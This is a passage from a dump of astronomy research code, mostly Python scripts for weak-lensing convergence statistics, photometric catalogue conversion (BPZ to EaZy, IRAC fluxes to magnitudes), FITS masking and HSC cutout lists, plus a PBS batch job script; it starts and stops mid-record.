np.loadtxt(\"%skappastatistics_WFI2033_5_23_45.lst\" % root, unpack=True)\n#kappastat_120 = np.loadtxt(\"%skappastatistics_WFI2033_5_23_120.lst\" % root, unpack=True)\nkappastat_45 = np.loadtxt(\"%skappacomputebias_WFI2033_5_23_45.lst\" % root, unpack=True)\nkappastat_120 = np.loadtxt(\"%skappacomputebias_WFI2033_5_23_120.lst\" % root, unpack=True)\n\nN = 18\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.1,0.1])\n#ax.set_ylabel('median$_\\kappa$')\nax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[2])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[2])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.05])\n#ax.set_ylabel('$\\sigma_\\kappa$')\nax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects3[0], rects4[0]), ('45 23 gal+1/r+', '120 23 gal+1/r+'), bbox_to_anchor=(0.6, 0.5), fontsize=10)\nplt.subplots_adjust(left=0.1, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\n#plt.savefig('%skappahistbar_noshear.png' % root, dpi=250)\nplt.savefig('%skappabiashistbar_noshear.png' % root, dpi=250)\n\nax = plt.subplot(2,1,1)\n\ncol5 = (kappastat_45[1])\nrects5 = ax.bar(ind + width, col5, width, color='r')\ncol6 = (kappastat_120[1])\nrects6 = ax.bar(ind + 2*width, col6, width, color='b')\n\n#ax.set_ylim([0.0,0.2])\nax.set_ylim([-0.1,0.1])\n#ax.set_ylabel('median$_\\kappa$')\nax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol7 = (kappastat_45[3])\nrects7 = ax.bar(ind + width, col7, width, color='r')\ncol8 = (kappastat_120[3])\nrects8 = ax.bar(ind + 2*width, col8, width, color='b')\n\nax.set_ylim([0,0.1])\n#ax.set_ylabel('$\\sigma_\\kappa$')\nax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects7[0], rects8[0]), ('45 23 gal+1/r+$\\gamma$+', '120 23 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.6, 0.3), fontsize=10)\nplt.subplots_adjust(left=0.1, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\n#plt.savefig('%skappahistbar_shear.png' % root, dpi=250)\nplt.savefig('%skappabiashistbar_shear.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.6883561611175537, "alphanum_fraction": 0.7465753555297852, "avg_line_length": 31.44444465637207, "blob_id": "782368b2cfb39f275efda854fb39755ade71529c", "content_id": "b749ebe4e6792dfedb4dff05ecfcf5562a089980", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 292, "license_type": "no_license", "max_line_length": 56, "num_lines": 9, "path": "/python/image_utilities/mask_repairwht.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open(\"ch2_4amin_rms.fits\")\nimagem = fits.open(\"ch2_4amin_nolens.fits\")\nimage[0].data[imagem[0].data == 0] = 10000000\nimage.writeto(\"ch2_4amin_nolens_rms.fits\",clobber=True)\n" }, { "alpha_fraction": 0.6275303363800049, "alphanum_fraction": 0.6639676094055176, "avg_line_length": 13.529411315917969, "blob_id": "f71eb2574b8184b2cb713a7728e4c0ca8412b765", "content_id": "0fb2442a53d9b762bab22df4bba66279b2b15281", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 36, "num_lines": 17, "path": "/python/scripts/NAOJ/batch3_ascii.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb3.out\n#PBS -e Logb3.err\n#PBS -N 3\n#PBS -l mem=40gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython ascii_to_fits3.py\n" }, { "alpha_fraction": 0.40746986865997314, "alphanum_fraction": 0.5401204824447632, "avg_line_length": 58.69784164428711, "blob_id": "3800617db260fbb0c7de6e943833d9dcec8cc0e5", "content_id": "b835abe53379f44756b66ef00c548b15076a773d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8300, "license_type": "no_license", "max_line_length": 229, "num_lines": 139, "path": "/python/catalogue_utilities/scriptABtoJkyEAzY_ugrizYJHK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert a photometric catalogue in the format expected by BPZ to the format expected by EaZy. The code handles non-detections (not yet non-exposures).\n##########################\n\nimport numpy as np\n\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\nfile = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpz.cat\"\n\n# zeropoint corrections suggested by BPZ:\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nK_corr = +0.06\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94 # computed by LePhare\nH_corr += 1.35\nK_corr += 1.83\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nY = 11\nY_err = 12\nJ = 13\nJ_err = 14\nH = 15\nH_err = 16\nK = 17\nK_err = 18\n\ndata = np.loadtxt(file,unpack=True)\n\n# apply the corrections\ndata[u][np.abs(data[u]) != 99.0] += u_corr\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[z][np.abs(data[z]) != 99.0] += z_corr\ndata[Y][np.abs(data[Y]) != 99.0] += Y_corr\ndata[J][np.abs(data[J]) != 99.0] += J_corr\ndata[H][np.abs(data[H]) != 99.0] += H_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# make non-detection fluxes -99\ndata[u][np.abs(data[u]) == 99.0] = -99\ndata[g][np.abs(data[g]) == 99.0] = -99\ndata[r][np.abs(data[r]) == 99.0] = -99\ndata[i][np.abs(data[i]) == 99.0] = -99\ndata[z][np.abs(data[z]) == 99.0] = -99\ndata[Y][np.abs(data[Y]) == 99.0] = -99\ndata[J][np.abs(data[J]) == 99.0] = -99\ndata[H][np.abs(data[H]) == 99.0] = -99\ndata[K][np.abs(data[K]) == 99.0] = -99\n\n# for the non-detections, replace error bars with the flux corresponsing to the corrected limiting mag\ndata[u_err][np.abs(data[u]) == 99.0] = 3631000000 * 10**(-(data[u_err][np.abs(data[u]) == 99.0] + u_corr)/2.5)\ndata[g_err][np.abs(data[g]) == 99.0] = 3631000000 * 10**(-(data[g_err][np.abs(data[g]) == 99.0] + g_corr)/2.5)\ndata[r_err][np.abs(data[r]) == 99.0] = 3631000000 * 10**(-(data[r_err][np.abs(data[r]) == 99.0] + r_corr)/2.5)\ndata[i_err][np.abs(data[i]) == 99.0] = 3631000000 * 10**(-(data[i_err][np.abs(data[i]) == 99.0] + i_corr)/2.5)\ndata[z_err][np.abs(data[z]) == 99.0] = 3631000000 * 10**(-(data[z_err][np.abs(data[z]) == 99.0] + z_corr)/2.5)\ndata[Y_err][np.abs(data[Y]) == 99.0] = 3631000000 * 10**(-(data[Y_err][np.abs(data[Y]) == 99.0] + Y_corr)/2.5)\ndata[J_err][np.abs(data[J]) == 99.0] = 3631000000 * 10**(-(data[J_err][np.abs(data[J]) == 99.0] + J_corr)/2.5)\ndata[H_err][np.abs(data[H]) == 99.0] = 3631000000 * 10**(-(data[H_err][np.abs(data[H]) == 99.0] + H_corr)/2.5)\ndata[K_err][np.abs(data[K]) == 99.0] = 3631000000 * 10**(-(data[K_err][np.abs(data[K]) == 99.0] + K_corr)/2.5)\n\n# make minimum delta mag 0.01\ndata[u_err][(np.abs(data[u]) != 99.0) & (np.abs(data[u_err]) == 0.00)] = 0.01\ndata[g_err][(np.abs(data[g]) != 99.0) & (np.abs(data[g_err]) == 0.00)] = 0.01\ndata[r_err][(np.abs(data[r]) != 99.0) & (np.abs(data[r_err]) == 0.00)] = 0.01\ndata[i_err][(np.abs(data[i]) != 99.0) & (np.abs(data[i_err]) == 0.00)] = 0.01\ndata[z_err][(np.abs(data[z]) != 99.0) & (np.abs(data[z_err]) == 0.00)] = 0.01\ndata[Y_err][(np.abs(data[Y]) != 99.0) & (np.abs(data[Y_err]) == 0.00)] = 0.01\ndata[J_err][(np.abs(data[J]) != 99.0) & (np.abs(data[J_err]) == 0.00)] = 0.01\ndata[H_err][(np.abs(data[H]) != 99.0) & (np.abs(data[H_err]) == 0.00)] = 0.01\ndata[K_err][(np.abs(data[K]) != 99.0) & (np.abs(data[K_err]) == 0.00)] = 0.01\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. Here I just replace their errors with 1 mag\ndata[u_err][np.abs(data[u_err]) == 99.00] = 1.00\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[z_err][np.abs(data[z_err]) == 99.00] = 1.00\ndata[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\ndata[J_err][np.abs(data[J_err]) == 99.00] = 1.00\ndata[H_err][np.abs(data[H_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# convert AB -> Jky\nx=data[u][np.abs(data[u]) != 99.0]\ny=data[u_err][np.abs(data[u]) != 99.0]\ndata[u_err][np.abs(data[u]) != 99.0] = 3631000000 * (10**(-(data[u][np.abs(data[u]) != 99.0] - data[u_err][np.abs(data[u]) != 99.0])/2.5) - 10**(-(data[u][np.abs(data[u]) != 99.0] + data[u_err][np.abs(data[u]) != 99.0])/2.5)) / 2\ndata[u][np.abs(data[u]) != 99.0] = 3631000000 * 10**(-data[u][np.abs(data[u]) != 99.0]/2.5)\ndata[g_err][np.abs(data[g]) != 99.0] = 3631000000 * (10**(-(data[g][np.abs(data[g]) != 99.0] - data[g_err][np.abs(data[g]) != 99.0])/2.5) - 10**(-(data[g][np.abs(data[g]) != 99.0] + data[g_err][np.abs(data[g]) != 99.0])/2.5)) / 2\ndata[g][np.abs(data[g]) != 99.0] = 3631000000 * 10**(-data[g][np.abs(data[g]) != 99.0]/2.5)\ndata[r_err][np.abs(data[r]) != 99.0] = 3631000000 * (10**(-(data[r][np.abs(data[r]) != 99.0] - data[r_err][np.abs(data[r]) != 99.0])/2.5) - 10**(-(data[r][np.abs(data[r]) != 99.0] + data[r_err][np.abs(data[r]) != 99.0])/2.5)) / 2\ndata[r][np.abs(data[r]) != 99.0] = 3631000000 * 10**(-data[r][np.abs(data[r]) != 99.0]/2.5)\ndata[i_err][np.abs(data[i]) != 99.0] = 3631000000 * (10**(-(data[i][np.abs(data[i]) != 99.0] - data[i_err][np.abs(data[i]) != 99.0])/2.5) - 10**(-(data[i][np.abs(data[i]) != 99.0] + data[i_err][np.abs(data[i]) != 99.0])/2.5)) / 2\ndata[i][np.abs(data[i]) != 99.0] = 3631000000 * 10**(-data[i][np.abs(data[i]) != 99.0]/2.5)\ndata[z_err][np.abs(data[z]) != 99.0] = 3631000000 * (10**(-(data[z][np.abs(data[z]) != 99.0] - data[z_err][np.abs(data[z]) != 99.0])/2.5) - 10**(-(data[z][np.abs(data[z]) != 99.0] + data[z_err][np.abs(data[z]) != 99.0])/2.5)) / 2\ndata[z][np.abs(data[z]) != 99.0] = 3631000000 * 10**(-data[z][np.abs(data[z]) != 99.0]/2.5)\ndata[Y_err][np.abs(data[Y]) != 99.0] = 3631000000 * (10**(-(data[Y][np.abs(data[Y]) != 99.0] - data[Y_err][np.abs(data[Y]) != 99.0])/2.5) - 10**(-(data[Y][np.abs(data[Y]) != 99.0] + data[Y_err][np.abs(data[Y]) != 99.0])/2.5)) / 2\ndata[Y][np.abs(data[Y]) != 99.0] = 3631000000 * 10**(-data[Y][np.abs(data[Y]) != 99.0]/2.5)\ndata[J_err][np.abs(data[J]) != 99.0] = 3631000000 * (10**(-(data[J][np.abs(data[J]) != 99.0] - data[J_err][np.abs(data[J]) != 99.0])/2.5) - 10**(-(data[J][np.abs(data[J]) != 99.0] + data[J_err][np.abs(data[J]) != 99.0])/2.5)) / 2\ndata[J][np.abs(data[J]) != 99.0] = 3631000000 * 10**(-data[J][np.abs(data[J]) != 99.0]/2.5)\ndata[H_err][np.abs(data[H]) != 99.0] = 3631000000 * (10**(-(data[H][np.abs(data[H]) != 99.0] - data[H_err][np.abs(data[H]) != 99.0])/2.5) - 10**(-(data[H][np.abs(data[H]) != 99.0] + data[H_err][np.abs(data[H]) != 99.0])/2.5)) / 2\ndata[H][np.abs(data[H]) != 99.0] = 3631000000 * 10**(-data[H][np.abs(data[H]) != 99.0]/2.5)\ndata[K_err][np.abs(data[K]) != 99.0] = 3631000000 * (10**(-(data[K][np.abs(data[K]) != 99.0] - data[K_err][np.abs(data[K]) != 99.0])/2.5) - 10**(-(data[K][np.abs(data[K]) != 99.0] + data[K_err][np.abs(data[K]) != 99.0])/2.5)) / 2\ndata[K][np.abs(data[K]) != 99.0] = 3631000000 * 10**(-data[K][np.abs(data[K]) != 99.0]/2.5)\n\n \n# 146 u_DEC: 200\n# 147 g_DEC: 300\n# 148 r_DEC: 300\n# 149 i_DEC: 600\n# 150 z_DEC: 400\n# 151 Y_DEC: 200\n# 152 J_HAWKI: 150 AB-Vega= 1.06\n# 153 H_HAWKI: 220 AB-Vega= 1.34\n# 154 Ks_HAWKI: 300 AB-Vega= 1.78\n \nfileout = file[:-11] + \"_forEazy.cat\"\nstr = \"id F146 E146 F147 E147 F148 E148 F149 E149 F150 E150 F151 E151 F152 E152 F153 E153 F154 E154\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f \\t %.4f')\n\n\n" }, { "alpha_fraction": 0.553084671497345, "alphanum_fraction": 0.576757550239563, "avg_line_length": 37.19178009033203, "blob_id": "8a552c9a0cb05f80c5eac3dea9ecb4ee645349b2", "content_id": "b7403547af59e229abc84f7066eb50b36cc2b81e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2788, "license_type": "no_license", "max_line_length": 216, "num_lines": 73, "path": "/python/image_utilities/HSClistforcutoutsS17AJames.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a catalogue of RA and DEC, produces the input lists for DAS Cutout and for the PSF cutout\n# run as python HSClistforcutouts.py /Volumes/LaCieSubaru/Gaia/James/SecrestHSC5arcsecS17A.fits # before running I crossmatched the catalogue with itself to check that there are no multiple detections inside 5 arcsec\n\nimport os\nimport sys\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\ncat = str(sys.argv[1])\ns = cat.split('/')[:-1]\npath = ''\nfor i in range(len(s)):\n path = path + s[i] + '/'\n\nif \".fits\" in cat:\n from astropy.table import Table\n t = Table.read(cat)\n coord = np.c_[t['ra'],t['dec']].T\nelse:\n ra = 4\n dec = 6\n coord = np.loadtxt(cat,usecols=[ra,dec],unpack=True)\nhead = '#? rerun filter ra dec sw sh # column descriptor\\n'\nheadpsf = '#? ra dec filter type rerun centered\\n'\nrerun = 's18a_wide'\nfilters = ['HSC-G','HSC-R','HSC-I','HSC-Z','HSC-Y']\nfilterspsf = ['g','r','i','z','y']\nsw = '3.5asec'\nsh = '3.5asec'\ndescriptor = '#'\n\nlen1 = np.shape(coord[0])[0] * len(filters) / 1000\nlen2 = np.shape(coord[0])[0] * len(filters) % 1000\nif len2 > 0: len1 +=1\nlen3 = np.shape(coord[0])[0] * len(filters) / len1\nlen4 = np.shape(coord[0])[0] * len(filters) % len1\nlen4 = len3 + len4\n\nfout = []\nfoutpsf = []\nfor i in range(len1):\n fout.append(path + cat.split('/')[-1][:-5] + '_cutout' + str(i) +'.cat')\n foutpsf.append(path + cat.split('/')[-1][:-5] + '_psfcutout' + str(i) +'.cat')\n os.system(\"rm -f %s\" % fout[i])\n os.system(\"rm -f %s\" % foutpsf[i])\n\nstrcoord = []\nstrcoordpsf = []\nfor i in range(np.shape(coord[0])[0]):\n x = SkyCoord(np.float(coord[0][i]), np.float(coord[1][i]), unit='deg')\n strcoord.append('{0} {1}'.format(x.ra.to_string(unit=u.hourangle, sep=':', precision=2, pad=True), x.dec.to_string(sep=':', precision=2, alwayssign=True, pad=True)))\n strcoordpsf.append('{0} {1}'.format(x.ra.deg, x.dec.deg))\n\n\npos = 0\nfor i in range(len1):\n f = open(fout[i],'a')\n g = open(foutpsf[i],'a')\n f.write(head)\n g.write(headpsf)\n if i == 0:\n for j in range(len4):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n g.write(strcoordpsf[pos / len(filters)] + ' ' + filterspsf[pos % len(filters)] + ' coadd ' + rerun + ' true \\n')\n pos += 1\n if i != 0:\n for j in range(len3):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n g.write(strcoordpsf[pos / len(filters)] + ' ' + filterspsf[pos % len(filters)] + ' coadd ' + rerun + ' true \\n')\n pos += 1\n f.close()\n g.close()\n" }, { "alpha_fraction": 0.5955399870872498, "alphanum_fraction": 0.652383029460907, "avg_line_length": 43.843135833740234, "blob_id": "62dba80cd991a87f1addff1c863f62a42879a695", "content_id": "2d103d391f77a6af7530f48a557d7d60584ba055", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2287, "license_type": "no_license", "max_line_length": 151, "num_lines": 51, "path": "/python/catalogue_utilities/inferkappa_forChihFan.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu July 9 2018\n# kappagammaforChihFan.py should be run first to get the files kappagamma_values_GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f.dat etc.\n# I am not correcting for bias by dividing by the number of lines of sight inside subintervals because the shears from Ken are very narrow\n\nimport numpy as np\nimport time\n\nstart_time=time.time()\n\n#models = ['noshear','powNFWG1G2','powNFWG1','powNFW','compNFW','powSISG1']\n#shear = [0,0.047,0.038,0.041,0.050,0.011]\n#shearerr = [10,0.0062,0.0095,0.0099,0.0075,0.0070]\n#models = ['powSISG1']\n#shear = [0.011]\n#shearerr = [0.0070]\n\nroot = \"/lfs08/rusucs/kappaplanes/\"\n\nprint \"Reading...\"\n\nfor j in range(8):\n for i in range(8):\n print j,i\n #kappa_,gamma_ = np.loadtxt(\"%skappagamma_values_GGL_los_8_%s_%s_N_4096_ang_4_rays_to_plane_34_f.dat\" % (root,str(j),str(i)), unpack=True)\n kappa_ = np.loadtxt(\"%skappagamma_values_GGL_los_8_%s_%s_N_4096_ang_4_rays_to_plane_34_f.dat\" % (root,str(j),str(i)), usecols=[0], unpack=True)\n if i == 0 and j == 0:\n kappa = kappa_\n #gamma = gamma_\n else:\n kappa = np.append(kappa,kappa_)\n #gamma = np.append(gamma,gamma_)\n\nbin_stat = 3000\nmin_kappa = -0.50\nmax_kappa = 1\n\n#for i in range(len(models)):\n# output = '%skappagamma_values_GGL_los_8_N_4096_ang_4_rays_to_plane_34_f_%s.dat' % (root,models[i])\n# kappafinal = kappa[(gamma > shear[i] - shearerr[i]) & (gamma < shear[i] + shearerr[i])]\n# kappahist = np.histogram(kappafinal, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float)\n# kappaindex = np.histogram(kappafinal, bins = bin_stat, range=(min_kappa,max_kappa))[1].astype(float)\n# np.savetxt(output,np.c_[kappaindex[:-1],kappahist],fmt='%s',delimiter='\\t',newline='\\n',header=\"%s\" % len(kappafinal))\n\noutput = '%skappagamma_values_GGL_los_8_N_4096_ang_4_rays_to_plane_34_f_kappahist.dat' % root\nkappahist = np.histogram(kappa, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float)\nkappaindex = np.histogram(kappa, bins = bin_stat, range=(min_kappa,max_kappa))[1].astype(float)\nnp.savetxt(output,np.c_[kappaindex[:-1],kappahist],fmt='%s',delimiter='\\t',newline='\\n',header=\"%s\" % len(kappa))\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.4410039186477661, "alphanum_fraction": 0.6082138419151306, "avg_line_length": 42.81428527832031, "blob_id": "960d4cca67f27868b3dcf38b05cd95f8c14c96fd", "content_id": "b92b5727e6baba3c264c6809754f8cf3db294f54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3068, "license_type": "no_license", "max_line_length": 171, "num_lines": 70, "path": "/python/catalogue_utilities/convertIRACfluxestoAB.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Takes outputs from Tphot/Tfit and converts them to Lephare-expected input\n##########################\n\n\nimport numpy as np \n\nfile1 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch1_4amin_nolens_SingleFit_1/ch1_ir_tphot.cat_pass2_best\"\nfile2 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch2_4amin_nolens_SingleFit_1/ch2_ir_tphot.cat_pass2_best\"\nfile3 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch3_4amin_nolens_SingleFit_1/ch3_ir_tphot.cat_pass2_best\"\nfile4 = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033_IRAC/modifiedforTPHOT/ch4_4amin_nolens_SingleFit_1/ch4_ir_tphot.cat_pass2_best\"\n\ndata1 = np.loadtxt(file1,usecols=(1,2,7,8),unpack=True)\ndata2 = np.loadtxt(file2,usecols=(7,8),unpack=True)\ndata3 = np.loadtxt(file3,usecols=(7,8),unpack=True)\ndata4 = np.loadtxt(file4,usecols=(7,8),unpack=True)\n\ntemperrfunc1 = 0.23\ntemperrfunc2 = 0.27\ntemperrfunc3 = 0.30\ntemperrfunc4 = 0.35\n\nx = data1[0] * 3.0\ny = data1[1] * 3.0\n\nch1 = data1[2]\nch1err = data1[3]\nch1[(ch1 < 0) | (ch1 - ch1err <= 0)] = -99.0\nch1err[ch1 < 0] = -99.0\nch1err[ch1 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch1[ch1 > 0]-ch1err[ch1 > 0]) - (21.58 - 2.5 * np.log10(ch1[ch1 > 0]+ch1err[ch1 > 0]))) / 2.0) ** 2 + temperrfunc1 ** 2)\nch1[ch1 > 0] = 21.58 - 2.5 * np.log10(ch1[ch1 > 0])\nch1[ch1err >= 1] = -99.0 # 1 sigma detection\nch1err[ch1err >= 1] = -99.0\n#ch1err[ch1 > 0] = 21.58 - 2.5 * np.log10(ch1[ch1 > 0]-ch1err[ch1 > 0]) - (21.58 - 2.5 * np.log10(ch1[ch1 > 0]+ch1err[ch1 > 0])) / 2.0\n#ch1err[ch1 > 0] = 21.58 - 2.5 * np.log10(ch1[ch1 > 0]-ch1err[ch1 > 0])\n#print ch1[ch1 > 0]\n#print ch1err[ch1 > 0]\n\nch2 = data2[0]\nch2err = data2[1]\nch2[(ch2 < 0) | (ch2 - ch2err <= 0)] = -99.0\nch2err[ch2 < 0] = -99.0\nch2err[ch2 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch2[ch2 > 0]-ch2err[ch2 > 0]) - (21.58 - 2.5 * np.log10(ch2[ch2 > 0]+ch2err[ch2 > 0]))) / 2.0) ** 2 + temperrfunc2 ** 2)\nch2[ch2 > 0] = 21.58 - 2.5 * np.log10(ch2[ch2 > 0])\nch2[ch2err >= 1] = -99.0\nch2err[ch2err >= 1] = -99.0\n\nch3 = data3[0]\nch3err = data3[1]\nch3[(ch3 < 0) | (ch3 - ch3err <= 0)] = -99.0\nch3err[ch3 < 0] = -99.0\nch3err[ch3 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch3[ch3 > 0]-ch3err[ch3 > 0]) - (21.58 - 2.5 * np.log10(ch3[ch3 > 0]+ch3err[ch3 > 0]))) / 2.0) ** 2 + temperrfunc3 ** 2)\nch3[ch3 > 0] = 21.58 - 2.5 * np.log10(ch3[ch3 > 0])\nch3[ch3err >= 1] = -99.0\nch3err[ch3err >= 1] = -99.0\n\nch4 = data4[0]\nch4err = data4[1]\nch4[(ch4 < 0) | (ch4 - ch4err <= 0)] = -99.0\nch4err[ch4 < 0] = -99.0\nch4err[ch4 > 0] = np.sqrt(((21.58 - 2.5 * np.log10(ch4[ch4 > 0]-ch4err[ch4 > 0]) - (21.58 - 2.5 * np.log10(ch4[ch4 > 0]+ch4err[ch4 > 0]))) / 2.0) ** 2 + temperrfunc4 ** 2)\nch4[ch4 > 0] = 21.58 - 2.5 * np.log10(ch4[ch4 > 0])\nch4[ch4err >= 1] = -99.0\nch4err[ch4err >= 1] = -99.0\n\n\nfileout = \"IRAC.cat\"\nstr = \"x y ch1 ch1err ch2 ch2err ch3 ch3err ch4 ch4err\"\ndataout = np.c_[x,y,ch1,ch1err,ch2,ch2err,ch3,ch3err,ch4,ch4err]\nnp.savetxt(fileout,dataout,header=str,fmt='%.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\n" }, { "alpha_fraction": 0.6389994025230408, "alphanum_fraction": 0.691401481628418, "avg_line_length": 48.51515197753906, "blob_id": "1995f4f47f30296a0c751329ab0994976db9fa45", "content_id": "b0b7d32cc8a3af69f9e26e7578c5af86c79ac8a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13072, "license_type": "no_license", "max_line_length": 